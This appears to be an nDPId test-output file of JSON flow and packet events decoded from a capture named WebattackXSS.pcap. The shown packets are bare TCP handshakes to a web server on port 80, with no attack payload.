-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7609,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":538,"flow_packet_id":3,"flow_last_seen":1499347882404,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347882404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eWhAAD4GTHCsEAABwKgKMoOYAFA4phxSQoFkyYAQAOXdvgAAAQEICgE8ZTYD5jaq"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347883693,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347883693,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33702,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":1,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8WYNAAD4GbE2sEAABwKgKMoOmAFDBWz\/7AAAAAKACchByAgAAAgQFtAQCCAoBPGZ4AAAAAAEDAwc="} 
-00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":2,"flow_last_seen":1499347883693,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347883693,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg6YJ\/gJMwVs\/\/KAScSAqxQAAAgQFtAQCCAoD5jfsATxmeAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7620,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":539,"flow_packet_id":3,"flow_last_seen":1499347883694,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347883694,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0WYRAAD4GbFSsEAABwKgKMoOmAFDBWz\/8Cf4CTYAQAOXJzAAAAQEICgE8ZngD5jfs"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347756244,"flow_last_seen":1499347761829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347757502,"flow_last_seen":1499347762829,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1499347758774,"flow_last_seen":1499347763831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347761418,"flow_last_seen":1499347766830,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7633,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347762675,"flow_last_seen":1499347767831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347885019,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347886296,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347886296,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33728,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7636,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":1,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8J3NAAD4Gnl2sEAABwKgKMoPAAFDfgE5wAAAAAKACchBCwwAAAgQFtAQCCAoBPGkDAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7637,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":2,"flow_last_seen":1499347886296,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347886296,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg8DWbqB034BOcaAScSCOYQAAAgQFtAQCCAoD5jp3ATxpAwEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7638,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":540,"flow_packet_id":3,"flow_last_seen":1499347886297,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347886297,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0J3RAAD4GnmSsEAABwKgKMoPAAFDfgE5x1m6gdYAQAOUtaQAAAQEICgE8aQMD5jp3"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347887572,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347887572,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33742,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7648,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":1,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8vidAAD4GB6msEAABwKgKMoPOAFDy3tRlAAAAAKACchCoIgAAAgQFtAQCCAoBPGpCAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7649,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":2,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347887572,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg85IicNz8t7UZqAScSBdaAAAAgQFtAQCCAoD5ju2ATxqQgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7650,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":541,"flow_packet_id":3,"flow_last_seen":1499347887572,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347887572,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0vihAAD4GB7CsEAABwKgKMoPOAFDy3tRmSInDdIAQAOX8bwAAAQEICgE8akID5ju2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347890192,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347890192,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33768,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":1,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8gVNAAD4GRH2sEAABwKgKMoPoAFBPU+2CAAAAAKACchAv6AAAAgQFtAQCCAoBPGzRAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7670,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":2,"flow_last_seen":1499347890192,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347890192,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg+hXA92bT1Ptg6AScSC5\/AAAAgQFtAQCCAoD5j5FATxs0QEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7671,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":542,"flow_packet_id":3,"flow_last_seen":1499347890193,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347890193,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0gVRAAD4GRISsEAABwKgKMoPoAFBPU+2DVwPdnIAQAOVZBAAAAQEICgE8bNED5j5F"} 
-00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347891536,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347891536,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33782,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7679,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":1,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8JsNAAD4Gnw2sEAABwKgKMoP2AFBiQUjiAAAAAKACchDAPAAAAgQFtAQCCAoBPG4hAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7680,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":2,"flow_last_seen":1499347891536,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347891536,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQg\/bwNNpHYkFI46AScSCzIwAAAgQFtAQCCAoD5j+VATxuIQEDAwc="} 
-00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7681,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":543,"flow_packet_id":3,"flow_last_seen":1499347891537,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347891537,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0JsRAAD4GnxSsEAABwKgKMoP2AFBiQUjj8DTaSIAQAOVSKwAAAQEICgE8biED5j+V"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347894093,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347894093,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33808,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7700,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":1,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8W6ZAAD4GaiqsEAABwKgKMoQQAFDdYCsGAAAAAKACchBgYAAAAgQFtAQCCAoBPHCgAAAAAAEDAwc="} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7701,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":2,"flow_last_seen":1499347894093,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347894093,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhBBGWrmb3WArB6AScSAbTwAAAgQFtAQCCAoD5kIUATxwoAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7702,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":544,"flow_packet_id":3,"flow_last_seen":1499347894094,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347894094,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0W6dAAD4GajGsEAABwKgKMoQQAFDdYCsHRlq5nIAQAOW6VgAAAQEICgE8cKAD5kIU"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347895396,"flow_last_seen":1499347895396,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895396,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":33822,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7709,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":1,"flow_last_seen":1499347895396,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895396,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8+PRAAD4GzNusEAABwKgKMoQeAFBBmIkSAAAAAKACchCcyAAAAgQFtAQCCAoBPHHmAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7710,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":2,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347895397,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQhB6fI8DwQZiJE6AScSD2UgAAAgQFtAQCCAoD5kNaATxx5gEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7711,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":545,"flow_packet_id":3,"flow_last_seen":1499347895397,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347895397,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0+PVAAD4GzOKsEAABwKgKMoQeAFBBmIkTnyPA8YAQAOWVWgAAAQEICgE8ceYD5kNa"} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":470,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347765229,"flow_last_seen":1499347770831,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60692,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":471,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347766506,"flow_last_seen":1499347771832,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60706,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":472,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347767793,"flow_last_seen":1499347772833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60720,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":7719,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":473,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347769077,"flow_last_seen":1499347774833,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347895873,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60734,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 